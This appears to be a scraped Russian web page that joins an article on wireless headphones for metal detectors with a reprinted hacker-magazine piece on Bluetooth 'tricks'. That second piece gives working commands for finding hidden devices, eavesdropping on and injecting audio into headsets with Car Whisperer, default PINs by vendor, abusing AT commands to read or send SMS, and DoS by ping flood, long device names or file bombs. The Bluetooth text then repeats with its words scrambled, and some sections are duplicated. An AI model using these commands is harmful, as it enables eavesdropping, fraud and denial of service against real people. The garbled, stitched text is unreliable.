0 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Разбираем bluetooth гарнитуру. Трюки с Bluetooth: маленькие хитрости использования «синего зуба

Содержание

Как разобрать беспроводные наушники. Как открыть наушники sony. Как разобрать наушники: инструкция с пошаговым фото ремонта всех элементов гарнитуры. Ремонт внутриканальных наушников

Наушники на копе — штука полезная. А беспроводные наушники для металлоикателя, а не MP3-плеера — ещё более полезная.

Не всегда можно включить полную озвучку. Не у всех металлодетекторов есть регулировка громкости звука. И тут без наушников вообще никак. Ну и на предельной глубине услышать слабый сигнал проще, конечно же, в наушниках.

Но наушники с проводом — это вечное подёргивание. Повёл штангой — пошёл провод. Пошёл провод — потянул наушники. А это бесит.

Беспроводные наушники ничего не дёргает, провод не мешает — красота, да и только!

Что такое современные беспроводные наушники

Наушники состоят из передатчика и приёмника. Передатчик на блоке получает от катушки аналоговый звуковой сигнал, кодирует его в MP3, преобразует в определённые радиоволны (снова аналог) и выдаёт в эфир. Наушники — это радиоприёмник сигнала, аналого-цифровой преобразователь и MP3 плеер. А MP3-плеер — это цифроаналоговый преобразователь и динамик.

Итак, сигнал от катушки, который идёт на динамик, у аналоговых приборов преобразуется схемой в звук. У цифровых сигнал катушки оцифровывается, обрабатывается процессором и программным обеспечением прибора, на основе анализа сигнала формируется число VDI и генерируется звук определённой частоты.

При использовании беспроводных наушников по протоколу Bluetooth с аналоговым прибором звук надо оцифровать, упаковать в пакет данных, передать в эфир, а наушники должны пакет принять, распаковать и воспроизвести. В цифровом приборе звук можно было бы и не упаковывать — пусть бы наушники разбирались с сигналом. Но тогда наушники работали бы только с конкретным прибором, а в их аппаратной части должен был бы быть не просто MP3-плеер, а фактически дублёр процессора самого прибора. Поэтому почти — важная оговорка — почти никто так не делает. Всё равно генерируется звук, а дальше всё как в предыдущем случае — оцифровали, передали, приняли, воспроизвели, превратив цифровой сигнал в звук.

Основные плюсы и минусы беспроводных наушников

Начнём с минусов:

  1. Нестабильный сигнал. Вернее, не всегда стабильный сигнал. Если аналоговый сигнал, пусть слабый, пусть прерывистый, мы всё равно будем слышать, то при плохом приёме цифрового сигнала вместо тихого, неуверенного звука будет или тишина, или характерное цифровое «бульканье».
  2. Наушникам нужно автономное питание. То есть, либо их надо заряжать от сети или пауэрбанка, или иметь запасной комплект — а может, и не один — стандартного питания. Это если наушники умеют работать от обычных батареек.
  3. Вес. Аккумулятор или элемент питания, процессор, bluetooth-приёмник увеличивают вес наушников.
  4. Чувствительность к температуре. Низкая температура воздуха способствует быстрому высаживанию питания.

Единственный, но жирный плюс беспроводных наушников — это отсутствие провода. Ну и бонус — возможность регулировки громкости. И этот плюс перевешивает все недостатки. Представьте себе — наушники никто не дёргает. Не нужно отключать наушники, когда кладёшь металлоискатель на землю и судорожно дёргать головой, если забыл про наушники и всё-таки положил.

Сломался регулятор громкости

Если вы не заметили никаких повреждений, но уверены, что проблема в регуляторе громкости, лучше отнести наушники в сервис

Чтобы проверить, действительно ли выход из строя аксессуара связан с поломкой регулятора громкости, нужно разобрать его и детально осмотреть:

  • С помощью отвёртки раскрутите прибор.
  • Между двумя его половинками вставьте нож и раскройте регулятор громкости.
  • Выньте плату и хорошо осмотрите её. Если обнаружен оторванный проводок или несколько из них, с помощью паяльника припаяйте их на место, предварительно зачистив и скрутив распушившиеся проводки.

Зачастую поломка происходит из-за того, что ползунок, передвигающийся внутри переключателя, дёргают слишком резко. Это приводит к его быстрому изнашиванию и отрыванию проводов от контактов. Проверить правильность пайки всех проводов к плате можно с помощью мультиметра.

Какие модели беспроводных наушников выбирают профессионалы

Разберем несколько популярных производителей металлоискателей.

Беспроводные наушники WS4 для металлоискателя XP Deus. Топовые наушники для топового прибора. Это не просто наушники. Это практически дублёр блока управления металлодетектора — наушники работают не только на приём, но и на передачу. Наличие в наушниках дублирующего блока управления позволило не передавать на наушники звук. А передавать тот же сигнал, что идёт на дисплей. И на динамик. И предотвратить потери на преобразования цифра — звук — цифра — звук, которые есть у других наушников. А ещё есть WS5. Влагозащищённые, всепогодные и тоже представляющие собой блок управления Деусом. И более продвинутые, чем WS 4. На фоне этих монстров WS 1 и WS 3 от XP — это просто хорошие bluetooth-наушники.

У Minelab

Беспроводные наушники для minelab — это не банальный bluetooth-приёмник. Инженеры минелаб придумали интересный гибрид проводного и беспроводного решения — прибор PRO-SONIC. Он представляет собой комплект из передатчика и приёмника в отдельном корпусе с динамиком и кабельным вводом 6,35 мм, в который можно включить любимые проводные наушники. Самое главное — развязаны блок металлодетектора и голова копаря.

У Garrett

До Minelab свой комплект из передатчика и приёмника под названием Z-lynk (читается зи-линк) презентовала фирма Garrett. А до неё такое же решение показала Deteknix. Гарретт заявляет, что её наушники имеют нулевую задержку по сигналу, действуя быстрее, чем блютуз в пять (!) раз.

Недорогие изделия

QCY Q26

Гарнитура отличается простеньким и невзрачным дизайном, однако она качественная и практичная. Подобное приобретение наверняка придется по нраву абсолютно всем, кто отдает предпочтение качественному звуку с хорошим запасом громкости, но при этом не привык переплачивать. С возложенными задачами этот аппарат справляется превосходно. Масса изделия незначительная, поэтому оно превосходно держится на ушной раковине, не вызывая ее усталость на протяжении долгого времени.

Гарнитура поддерживает воспроизведение широкого диапазона частот – от 20 Гц до 20 кГц. Корпус характеризуется надежной защитой от проникновения воды, поэтому гаджетом можно пользоваться даже в сильный дождь. Хотя аппарат достаточно новый, его предпочитает уже большое количество пользователей.

  • Прекрасный уровень звукоизоляции – собеседника хорошо слышно;
  • Вполне приемлемое качество сборки;
  • Аппарат выдает широкий диапазон частот;
  • Миниатюрные габаритные размеры.
  • Недолго работает в режиме разговора.

Samsung EO-MG920

Смотрится аппарат весьма стильно, его вес составляет всего лишь 9,2 грамма – устройство практически не будет ощущаться на ухе. Корпус изготавливается из прочного пластика с ребристой текстурой. Неудивительно, что гарнитура работает на основе интерфейса Bluetooth 3.0 – это позволяет аппарату синхронизироваться с большим количеством девайсов от самых разных производителей. Здесь также имеется голосовой набор.

Несмотря на то, что устройство обладает низкой стоимостью, его можно подключать сразу к двум аппаратам одновременно, имеется функция активного подавления шумов. Качество звука вполне приемлемое, никаких нареканий к нему у пользователей не возникало.

  • Стильный внешний вид;
  • Значительный радиус действия;
  • Продолжительное время работы от аккумулятора;
  • Есть все необходимое для комфортного использования.
  • Не предусмотрен A2DP, поэтому звонок в самой гарнитуре слышен не будет;
  • Некоторым пользователям кажется, что гарнитура получилась весьма габаритной.

Xiaomi Millet Bluetooth headset mini

Еще одна не слишком дорогостоящая модель, выпущенная китайским предприятием, инженеры которого уже давно занимаются выпуском высокотехнологичной продукции. Конструкция обладает незначительными габаритными размерами, практически ничего не весит. Главным отличительным моментом этого аппарата является оригинальный пластиковый корпус, который тщательно защищен от попадания влаги – такой гарнитурой можно пользоваться даже в сильный дождь, не опасаясь того, что устройство выйдет из строя.

Конструкция оснащена удобным голосовым помощником, который включается нажатием на одну кнопку на корпусе. Он будет своевременно предупреждать о том, что заряд вот-вот закончится. Подключение к внешним устройствам обеспечивается за счет модуля Bluetooth 4.1, радиус действия сигнала при этом составляет 10 метров. При желании можно прослушивать музыку в формате моно, есть система подавления шумов активного типа. В режиме разговора способна проработать в автономном режиме до 4 часов.

Читать еще:  Отечественные аналоги Google Street View. Существуют ли аналоги Google Glass

Ещё: ТОП-10 лучших подводных лодок мира

  • Очень хорошо слышно собеседника;
  • Простая в использовании;
  • Незначительная масса;
  • Есть басовая линия;
  • Хорошее качество микрофона.
  • Кнопка нажимается несколько туговато.

Jabra Talk 15

В качестве материала для изготовления корпуса этой гарнитуры использовался оригинальный прорезиненный пластик с особым покрытием soft-touch, поэтому данный девайс получился весьма устойчивым по отношению к разного рода физическим воздействиям: он может выдерживать падения со значительной высоты. Гарнитура характеризуется незначительными габаритами и стильным внешним видом, также она обладает технологией multipoint, за счет которой гаджет способен подключаться одновременно к нескольким устройствам. Дальность действия сигнала на открытой местности достигает 10 метров.

Звук вполне качественный и у динамика, и у микрофона, прибор оборудован системой подавления шумов. В режиме непрерывного использования гарнитура может проработать вплоть до 6 часов, заряжается через USB менее чем за 2 часа. Есть несколько кнопок управления функциями – все они находятся на корпусе.

  • Отличное качество изготовления;
  • Приемлемый звук;
  • При желании можно послушать музыку;
  • Аккумулятор работает довольно долгое время;
  • Простое управление.

Как подключить и настроить беспроводные наушники к металлоискателю

Обычные блютуз-наушники подключаются по инструкции. То есть глушим (по крайней мере у XP это так) специальным штекером разъём проводных наушников, активируем bluetooth на блоке металлоискателя, спариваем с наушниками.

Подключая минелабовские Garrett Z-Lynk к той же «тёрке» X-Terra 705 нужно включить приёмник и передатчик, подержать кнопки на них, пока приборы не найдут и не идентифицируют друг друга, а затем уже подключить передатчик к блоку управления и закрепить его на штанге, а приёмник прикрепить к одежде или положить в карман, а в него уже воткнуть наушники.

Сломался регулятор громкости

Если вы не заметили никаких повреждений, но уверены, что проблема в регуляторе громкости, лучше отнести наушники в сервис

Чтобы проверить, действительно ли выход из строя аксессуара связан с поломкой регулятора громкости, нужно разобрать его и детально осмотреть:

  • С помощью отвёртки раскрутите прибор.
  • Между двумя его половинками вставьте нож и раскройте регулятор громкости.
  • Выньте плату и хорошо осмотрите её. Если обнаружен оторванный проводок или несколько из них, с помощью паяльника припаяйте их на место, предварительно зачистив и скрутив распушившиеся проводки.

Зачастую поломка происходит из-за того, что ползунок, передвигающийся внутри переключателя, дёргают слишком резко. Это приводит к его быстрому изнашиванию и отрыванию проводов от контактов. Проверить правильность пайки всех проводов к плате можно с помощью мультиметра.

Делаем беспроводные наушники для металлоискателя своими руками

Смастерить приёмопередатчик Z-Lynk из дешёвых подручных материалов учит канал MD5 TV. Два штекера, FM-трансмиттер с алиэкспресс и приёмник оттуда же — и готов аналоговый радиоканал для связи с наушниками. И никакого bluetooth.

Канал Седая Русь также не стал связываться с цифровыми технологиями и блютузом. Aliexpress — просто кладезь для кулибиных и самоделкиных всего мира. Внутриканальные «затычки» и комплект из радиопередатчика с фиксированными частотами и приёмника с такими же частотами в плоских корпусах к клипсами — и готовы беспроводные наушники для металлоискателя.

Трюки с Bluetooth: маленькие хитрости использования «синего зуба»

Содержание статьи

Все отлично знают, что с помощью Bluetooth можно передать файл с девайса на девайс или подключить беспроводную гарнитуру. Но этим его возможности не ограничиваются. Имея при себе нужный инструмент, можно творить настоящие чудеса. Так почему бы не попробовать себя в роли фокусника?

Встроенный модуль технологии Bluetooth (или, если более официально, IEEE 802.15.3) давно перестал быть диковинкой. Стоимость модуля настолько мизерна, что не встраивает его в мобильный, ноутбук или КПК только ленивый производитель. Да и то – по соображениям маркетинга. Словом, Bluetooth используют практически все. Но лишь единицы знают, что, используя технологию, рискуют выдать свои конфиденциальные данные. Но начнем все-таки с хорошего!

Трюк 1: Используем BT для удаленного доступа к компьютеру

Как-то для проведения презентации я пригласил одну длинноногую подругу – нажимать кнопку «пробел», чтобы перелистывать слайды в Power Point. Это удовольствие стоило мне недешевого обеда и двух часов пустых разговоров с Barbie girl. После этого я твердо решил: в следующий раз проблему отсутствия пульта ДУ я обойду по-другому. И обошел, воспользовавшись мобильником! Да-да, прямо с телефона можно перелистывать слайды, управлять музыкой – и делать еще бог знает что. Главное, чтобы на мобильнике и компьютере были установлены BT-модули. Мало того, что сэкономишь деньги и силы, так еще и выглядеть будешь непростительно модно. Показать такой фокус способен каждый, кто заюзает утилиту
Bluetooth Remote Control
, не столь давно обновившуюся до версии 3.0. Она позволяет управлять компьютером с экрана любого мобильного телефона. Все очень просто. На компьютер ставится специальная серверная часть, а на телефон – программа-клиент, написанная на Java (требуется MIDP 2.0). После настройки нехитрой схемы ты сможешь дистанционно управлять мышкой и клавиатурой компа. И самое главное – получишь доступ к удаленному рабочему столу. Настоящий Remote Desktop прямо с экрана мобильного телефона! Ну, а с длинноногой подругой время можно провести куда более удачно. Bluetooth Remote Control пригодится и здесь: чтобы поставить
романтическую музыку :).

Трюк 2: Контроль доступа с помощью BT

Если ты работаешь в комнате, где вместе с тобой сидит с десяток коллег, тебе наверняка приходилось блокировать компьютер, когда уходишь в другое помещение. А что? Не успеешь отойти, как кто-нибудь уже покопается на твоем харде. Расклад не самый приятный. В общем, лочить компьютер нужно обязательно, вопрос в том – как? Можно использовать стандартные возможности винды и по десять раз на дню вводить длиннющий пароль. Или же делать это красиво с помощью технологии Bluetooth. Все просто, как дважды два. Отходишь от компьютера – и он тут же блокируется. Возвращаешься обратно – и лока как не бывало! Единственное условие: как в компьютере, так и в мобильном телефоне должен быть установлен модуль
Bluetooth, а в системе заинсталена программа LockItNow ( ты легко можешь написать такую программу и сам, у нас была целая статья ) . Впрочем, приятелям и коллегам можно рассказывать о телепатических возможностях, а потом продавать секрет за деньги :). Кстати говоря, если под рукой BT-модуля нет, то его можно заменить телефоном, который поддерживает «синий зуб» (подключи по COM-порту).

Трюк 3: Снифаем BT-трафик из эфира

Мастерство начинается с понимания. Не возникало ли у тебя когда-нибудь желания посмотреть внутрь протокола и узнать, как происходит обмен данными через «синий зуб»? Прослушивание трафика Bluetooth может выполняться только «в себя», то есть выполняется перехват исходящего и входящего трафика узла, на котором ты отдал команды. В этом деле немаловажное значение имеет так называемый Host Controller Interface (HCI), который позволяет обращаться к передатчику. HCI-узел обычно подключается к узлу драйвера устройства Bluetooth (входящий поток) и к узлу L2CAP (исходящий поток). Windows платформа по умолчанию такой возможности не предоставляет. Однако сторонними разработчиками были выпущены
специальные драйвера, которые позволяют переводить стандартный донгл в сниффер. Традиционно показательной в этом плане является работа FTS4BT Wireless Bluetooth Protocol Analyzer, стоящего бешеные деньги. Продукт цепляет тем, что поддерживает новый Bluetooth v2.0 + EDR, на базе которого работают современные устройства и, более того, способен на лету декодировать весь трафик из эфира, аккуратно отсортировывая аудио, данные протоколов приложений и многое другое. Понятно, что для снифинга (да и вообще) наиболее актуальны USB-донглы класса 1, радиус действия которых достигает ста метров.

Трюк 4: Работаем с BT-адаптером напрямую

Долгое время Bluetooth стеки для Windows предоставляли настолько скудные возможности, что программисты просто обходили эту платформу стороной. Этим объясняется, что большинство программ для серьезных забав c «синим зубом» разрабатываются под никсовую платформу. Некоторые из хитрых приемов мы разберем именно на это платформе, а именно FreeBSD (напомню, что на диске прошлого номера мы выкладывали свежий 7.0 релиз этой ОС). Сама технология Bluetooth официально стала поддерживаться на ней только с 5-ой ветки на базе подсистемы Netgraph. Радует, что большинство USB-адаптеров совместимы с драйвером ng_ubt (его необходимо завести перед подключением устройства). Попробуем?

  1. Подключаем устройство: kldload ng_ubt
  2. Копируем сценарий подгрузки стека в удобное место: cp /usr/share/examples/netgraph/bluetooth/rc.bluetooth /usr/local/etc/rc.bluetooth
  3. Копируем сценарий подгрузки стека в удобное место и запускаем: sh /usr/local/etc/rc.bluetoots start ubt0

Теперь хочу познакомить тебя с утилитой hccontrol. Это одна из основных программ для работы с BT-модулем. Именно она выполняет все операции, связанные с интерфейсом HCI, и имеет следующий синтаксис: hccontrol –n . Проверим функциональность нашего устройства, просканиров эфир на наличие устройств:

hccontrol –n ubt0hci Inquiry

Как результат, утилита выведет информацию о найденных устройствах, в том числе их MAC-адреса. Надо заметить, что каждое из устройств Bluetooth, будь то хедсет или обыкновенный телефон, представляет некоторый набор сервисов. Базовый перечень включает в себя: CIP (Common ISDN Access), CTP (Cordless Telephony), DUN (dial-up networking), FAX (FAX), FTRN (Obex File Transwer), HSET (Headset), NAP (Network Access Point). Чтобы выяснить, какие сервисы предоставляет то или иное устройство, используется запрос на специальном протоколе SPD (Service Descovery Protocol). Сервер SPD работает непосредственно на машине-хосте и является исключительно информационной составляющей (повлиять на него
невозможно). Определить, какие сервисы предоставляют найденные устройства, можно с помощью соответствующей утилиты:

Читать еще:  Сотовые телефоны галакси xcover 2. Дополнительные камеры обычно монтируются над экраном устройства и используются в основном для видеоразговоров, распознавания жестов и др

# spdcontrol -a browse

Трюк 5: Находим скрытые устройства

Итак, эфир мы просканировали и даже выяснили, какие сервисы доступны на активных устройствах. Но вот загвоздка! Некоторые девайсы никак не выдают своего присутствия, поскольку находятся в режиме «Undiscoverable mode» и не отвечают на широковещательные запросы. По настройкам своего телефона ты наверняка знаешь о подобной опции безопасности. Однако обнаружить такие устройства все-таки можно!

Самый известный прием их обнаружения – тупой перебор MAC-адресов, то есть последовательная посылка запросов на разные адреса из определенного диапазона. Для этого нужно использовать очень простую утилиту Redfang, которая перебирает последние шесть байт адреса устройства и таким образом обнаруживает спрятавшиеся устройства.

Другой вариант – это использовать пассивные методики: перевести свое устройство в режим ожидания, при этом назначить сети какое-нибудь привлекательное имя:

hciconfig hci0 name BT_YANDEX
hciconfig hci0 down
hciconfig hci0 up
hcidump -V | grep bdaddr

В результате отобразятся все входящие соединения, среди которых могут запросто оказаться товарищи со скрытыми идентификаторами.

Трюк 6: Перехватываем из эфира разговоры по гарнитуре

Одна из основных угроз радиотехнологий состоит в том, что данные можно перехватить. Первое, что приходит в голову, касаемо Bluetooth – прослушать разговоры людей, использующих гарнитуру. И зачастую это реально! На хакерском фестивале What the Hack в Нидерландах специалисты из группы Trifinite продемонстрировали, как при помощи ноутбука с Linux, специальной программы и направленной антенны можно подслушать, о чем говорит через Bluetooth-гарнитуру водитель проезжающего автомобиля. Группа разработала программу Car Whisperer («Автомобильный шептун»). Возможности программы относительно невелики: прослушать можно только тех, кто забыл сменить заводские пароли доступа к Bluetooth наподобие
«0000» или «1234». Но таких бедолаг, поверь, очень и очень много! «Шептун» способен вклиниться и успешно пройти «pairing» устройств, получив информацию, передаваемую с каркита или хедсета на мобилку. Хочу обратить внимание: утилита позволяет не только получить информацию, передающуюся между хедсетом и мобилой, но и инжектить туда свою. Мы решили проверить возможности этой программы, скачав Car Whisperer с сайта разработчиков.

Перед началом операции рекомендуется изменить класс своего устройства, особенно если программа будет использоваться с компьютера:

hciconfig адаптер class 0x500204
# 0x500204 — это класс «phone»

В противном случае некоторые «умные» девайсы могут заподозрить неладное. Смотрим синтаксис утилиты, который выглядит следующим образом:

./carwhisperer «что внедряем в линию» «что захватываем из линии» «адрес устройства» [канал]

Мы взяли внедряемый файл прямо из папки утилиты, а в качестве выходного указали out.raw:

./carwhisperer 0 message.raw /tmp/out.raw
00:15:0E:91:19:73

На выходе получаем файл out.raw. Прослушать его в чистом виде нельзя: необходимо преобразовать в аудио формат, для чего потребуется дополнительная утилита. Подойдут довольно многие аудио конвертеры, например SoX:

raw –r 8000 –c 1 –s –w out.raw –t wav –r
44100 –c 2 out.wav

Кроме прослушивания, можно войти в систему, просмотреть телефонную книгу и воспользоваться другими возможностями «свободных рук» с Bluetooth. Принцип такой: сначала осуществляется поиск активных устройств и проверка на предмет сервиса HS (Head Set). Далее исследуется MAC-адрес устройства и производится попытка подключения с использованием стандартного ключа. Если коннект установлен, то с устройством можно делать все, что угодно (в пределах доступного набора AT-команд).

На практике это выглядит следующим образом. Сначала осуществляется поиск всех активных гарнитур с помощью команды «sdptool search HS», которая выдает примерно такой ответ:

Inquiring .
Searching for HS on 00:0A:3A:54:71:95 .
Service Name: Headset
Service RecHandle: 0x10009
Service Class ID List:
«Headset» (0x1108)
«Generic Audio» (0x1203)
Protocol Descriptor List:
«L2CAP» (0x0100)
«RFCOMM» (0x0003)
Channel: 7
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
«Headset» (0x1108)
Version: 0x0100

Далее осуществляется попытка открыть RFCOMM соединение на SCO audio channel с помощью команды «rfcomm connect 2 00:0A:3A:54:71:95 1» и посылка нужных AT-команд. Приведу небольшую статистическую заметку о данных авторизации на некоторые модели беспроводных гарнитур:

Nokia (00:02:EE. ) — pin=»5475″
Audi UHV (00:0E:9F. ) — pin=»1234″
O’Neill (00:80:37. ) — pin=»8761″
Cellink (00:0A:94. ) — pin=»1234″
Eazix (00:0C:84. ) — pin=»1234″

Кстати говоря, тот же принцип может использоваться для несанкционированного подключения и ко всем остальным устройствам. При помощи AT-команд и протокола RFCOMM можно, к примеру, прочитать SMS-сообщение или даже отправить его с чужого телефона на платный номер, поставив владельца девайса на деньги. Будь бдителен!

Трюк 7: DDoS BT-устройств

Подход традиционен. DDoS реально провести, когда хостовый девайс («master») выполняет работу, во много раз превосходящую клиентскую. Такую ситуацию называют атакой на отказ в обслуживании (Denial Of Service). Она может подвесить телефон или привести к быстрой разрядке батарейки. Провести атаку можно несколькими способами. Начнем со стандартных средств. Самое очевидное – пинговать девайс пакетами большого размера. Сделать это можно, указав утилите l2ping в качестве параметра «-s» флаг:

# l2ping -s 10000 -b «МАС адрес»

Сама программа, как ты уже понял, является родственником ping в bluetooth среде и служит для проверки связи и наличия соединения. Другой способ, принципиально отличающийся от первого, состоит в использовании приема «fuzzing» – своеобразной техники-лотереи, потому как заранее неизвестно, что произойдет. Это новое веяние в выявлении уязвимостей в продуктах без анализа исходных кодов. Полагается техника только на интерактивное общение с объектом на понятном для него языке, но с абсолютно хаотичными аргументами и значениями-переменными. Хакерской задачей будет сделать так, чтобы видимое название телефона состояло из достаточно большого числа элементов. При обнаружении его «master’ом» в 70%
случаев происходит переполнение или отказ в обслуживании:

hciconfig hci0 name `perl -e ‘print «ash» x 3137’`
# Команда для линукса
hccontrol –n адаптер change_local_name “новое имя”)
# пример для FreeBSD

Многие телефоны по-прежнему не могут переварить файлы-бомбы. Вот простая реализация подобного приема.

  1. Сначала готовят «бомбу». Известный пример:
    echo `perl -e ‘print «skvz» x 3137’` > file
  2. После чего используют модифицированную утилиту для взаимодействия с OBEX – USSP PUSH (xmailserver.org/ussp-push.html)
    ./obextool push file 00:0A:3A:54:71:95 `perl -e ‘print «skvz» x 3137’` 3


Полную версию статьи
читай в апрельском номере Хакера!
На нашем диске ты найдешь полные версии программ, описанных в статье, а также полную подборку документации Bluetooth и уязвимостей в этой технологии.

Трюки с Bluetooth: маленькие хитрости использования «синего зуба»

soft 12-11-2015 23:58

Все отлично знают, что с помощью можно Bluetooth передать файл с девайса на девайс подключить или беспроводную гарнитуру. Но этим его ограничиваются не возможности. Имея при себе нужный можно, инструмент творить настоящие чудеса. Так попробовать бы не почему себя в роли фокусника?

Встроенный технологии модуль Bluetooth (или, если более IEEE, официально 802.15.3) давно перестал быть Стоимость. диковинкой модуля настолько мизерна, что не его встраивает в мобильный, ноутбук или КПК ленивый только производитель. Да и то – по соображениям маркетинга. Словом, используют Bluetooth практически все. Но лишь единицы что, знают, используя технологию, рискуют выдать конфиденциальные свои данные. Но начнем все-таки с Трюк!

хорошего 1: Используем BT для удаленного доступа к Как

компьютеру-то для проведения презентации я пригласил длинноногую одну подругу – нажимать кнопку «пробел», перелистывать чтобы слайды в Power Point. Это стоило удовольствие мне недешевого обеда и двух пустых часов разговоров с Barbie girl. После твердо я этого решил: в следующий раз проблему пульта отсутствия ДУ я обойду по-другому. И обошел, воспользовавшись прямо! Да-да, мобильником с телефона можно перелистывать слайды, музыкой управлять – и делать еще бог знает Главное. что, чтобы на мобильнике и компьютере были модули BT-установлены. Мало того, что сэкономишь силы и деньги, так еще и выглядеть будешь модно непростительно. Показать такой фокус способен кто, каждый заюзает утилиту
Bluetooth Remote столь
, не Control давно обновившуюся до версии 3.0. Она управлять позволяет компьютером с экрана любого мобильного Все. телефона очень просто. На компьютер ставится серверная специальная часть, а на телефон – программа-клиент, Java на написанная (требуется MIDP 2.0). После настройки схемы нехитрой ты сможешь дистанционно управлять мышкой и компа клавиатурой. И самое главное – получишь доступ к рабочему удаленному столу. Настоящий Remote Desktop экрана с прямо мобильного телефона! Ну, а с длинноногой подругой можно время провести куда более удачно. Remote Bluetooth Control пригодится и здесь: чтобы романтическую

Трюк 2: Контроль доступа с Если BT

помощью ты работаешь в комнате, где вместе с сидит тобой с десяток коллег, тебе наверняка блокировать приходилось компьютер, когда уходишь в другое что?. А помещение Не успеешь отойти, как кто-уже нибудь покопается на твоем харде. Расклад не приятный самый. В общем, лочить компьютер нужно вопрос, обязательно в том – как? Можно использовать возможности стандартные винды и по десять раз на дню длиннющий вводить пароль. Или же делать это помощью с красиво технологии Bluetooth. Все просто, дважды как два. Отходишь от компьютера – и он тут же Возвращаешься. блокируется обратно – и лока как не бывало! условие Единственное: как в компьютере, так и в мобильном должен телефоне быть установлен модуль
Bluetooth, а в заинсталена системе программа LockItNow (ты легко можешь такую написать программу и сам, у нас была статья целая). Впрочем, приятелям и коллегам можно телепатических о рассказывать возможностях, а потом продавать секрет за Кстати :). деньги говоря, если под рукой BT-нет модуля, то его можно заменить телефоном, поддерживает который «синий зуб» (подключи по COM-Трюк).

Читать еще:  Keenetic lite 3 режимы. Подключение к Интернету

порту 3: Снифаем BT-трафик из эфира

Мастерство понимания с начинается. Не возникало ли у тебя когда-нибудь посмотреть желания внутрь протокола и узнать, как обмен происходит данными через «синий зуб»? трафика Прослушивание Bluetooth может выполняться только «в есть», то себя выполняется перехват исходящего и входящего узла трафика, на котором ты отдал команды. В этом немаловажное деле значение имеет так называемый Controller Host Interface (HCI), который позволяет передатчику к обращаться. HCI-узел обычно подключается к драйвера узлу устройства Bluetooth (входящий поток) и к L2CAP узлу (исходящий поток). Windows платформа по такой умолчанию возможности не предоставляет. Однако сторонними были разработчиками выпущены
специальные драйвера, которые переводить позволяют стандартный донгл в сниффер. Традиционно этом в показательной плане является работа FTS4BT Bluetooth Wireless Protocol Analyzer, стоящего бешеные Продукт. деньги цепляет тем, что поддерживает Bluetooth новый v2.0 + EDR, на базе которого работают устройства современные и, более того, способен на лету весь декодировать трафик из эфира, аккуратно отсортировывая данные, аудио протоколов приложений и многое другое. что, Понятно для снифинга (да и вообще) наиболее USB актуальны-донглы класса 1, радиус действия достигает которых ста метров.

Трюк 4: Работаем с BT-напрямую адаптером

Долгое время Bluetooth стеки Windows для предоставляли настолько скудные возможности, программисты что просто обходили эту платформу Этим. стороной объясняется, что большинство программ серьезных для забав c «синим зубом» разрабатываются никсовую под платформу. Некоторые из хитрых приемов мы именно разберем на это платформе, а именно FreeBSD (что, напомню на диске прошлого номера мы выкладывали релиз 7.0 свежий этой ОС). Сама технология Bluetooth стала официально поддерживаться на ней только с 5-ой ветки на подсистемы базе Netgraph. Радует, что большинство адаптеров-USB совместимы с драйвером ng_ubt (его завести необходимо перед подключением устройства). Попробуем?

  1. устройство Подключаем: kldload ng_ubt
  2. Копируем сценарий стека подгрузки в удобное место: cp /usr/share/netgraph/examples/bluetooth/rc.bluetooth /usr/local/bluetooth/rc.etc
  3. Копируем сценарий подгрузки стека в место удобное и запускаем: sh /usr/local/etc/rc.start bluetoots ubt0

Теперь хочу познакомить утилитой с тебя hccontrol. Это одна из основных для программ работы с BT-модулем. Именно она все выполняет операции, связанные с интерфейсом HCI, и следующий имеет синтаксис: hccontrol –n . Проверим функциональность нашего устройства, эфир просканиров на наличие устройств:

hccontrol –n ubt0hci Как

Inquiry результат, утилита выведет информацию о устройствах найденных, в том числе их MAC-адреса. заметить Надо, что каждое из устройств Bluetooth, хедсет то будь или обыкновенный телефон, представляет набор некоторый сервисов. Базовый перечень включает в CIP: себя (Common ISDN Access), CTP (Telephony Cordless), DUN (dial-up networking), FAX (FTRN), FAX (Obex File Transwer), HSET (NAP), Headset (Network Access Point). Чтобы какие, выяснить сервисы предоставляет то или иное используется, устройство запрос на специальном протоколе SPD (Descovery Service Protocol). Сервер SPD работает машине на непосредственно-хосте и является исключительно информационной повлиять (составляющей на него
невозможно). Определить, какие предоставляют сервисы найденные устройства, можно с помощью утилиты соответствующей:

# spdcontrol -a Трюк

browse 5: Находим скрытые устройства

Итак, просканировали мы эфир и даже выяснили, какие сервисы активных на доступны устройствах. Но вот загвоздка! Некоторые никак девайсы не выдают своего присутствия, поскольку режиме в находятся «Undiscoverable mode» и не отвечают на широковещательные настройкам. По запросы своего телефона ты наверняка знаешь о опции подобной безопасности. Однако обнаружить такие все устройства-таки можно!

Самый известный обнаружения их прием – тупой перебор MAC-адресов, то последовательная есть посылка запросов на разные адреса из диапазона определенного. Для этого нужно использовать простую очень утилиту Redfang, которая перебирает шесть последние байт адреса устройства и таким обнаруживает образом спрятавшиеся устройства.

Другой вариант – использовать это пассивные методики: перевести свое режим в устройство ожидания, при этом назначить какое сети-нибудь привлекательное имя:

hciconfig name hci0 BT_YANDEX
hciconfig hci0 down
hci0 hciconfig up
hcidump -V | grep bdaddr

В результате все отобразятся входящие соединения, среди которых запросто могут оказаться товарищи со скрытыми идентификаторами.

Перехватываем 6: Трюк из эфира разговоры по гарнитуре

Одна из угроз основных радиотехнологий состоит в том, что можно данные перехватить. Первое, что приходит в касаемо, голову Bluetooth – прослушать разговоры людей, гарнитуру использующих. И зачастую это реально! На хакерском What фестивале the Hack в Нидерландах специалисты из Trifinite группы продемонстрировали, как при помощи Linux с ноутбука, специальной программы и направленной антенны подслушать можно, о чем говорит через Bluetooth-водитель гарнитуру проезжающего автомобиля. Группа разработала Car программу Whisperer («Автомобильный шептун»). Возможности относительно программы невелики: прослушать можно только кто, тех забыл сменить заводские пароли Bluetooth к доступа наподобие
«0000» или «1234». Но бедолаг таких, поверь, очень и очень много! «способен» Шептун вклиниться и успешно пройти «pairing» получив, устройств информацию, передаваемую с каркита или мобилку на хедсета. Хочу обратить внимание: утилита только не позволяет получить информацию, передающуюся между мобилой и хедсетом, но и инжектить туда свою. Мы решили возможности проверить этой программы, скачав Car сайта с Whisperer разработчиков.

Перед началом операции изменить рекомендуется класс своего устройства, особенно программа если будет использоваться с компьютера:

hciconfig class адаптер 0x500204
# 0x500204 — это класс «противном»

В phone случае некоторые «умные» девайсы заподозрить могут неладное. Смотрим синтаксис утилиты, выглядит который следующим образом:

./carwhisperer «что линию в внедряем» «что захватываем из линии» «адрес канал» [устройства]

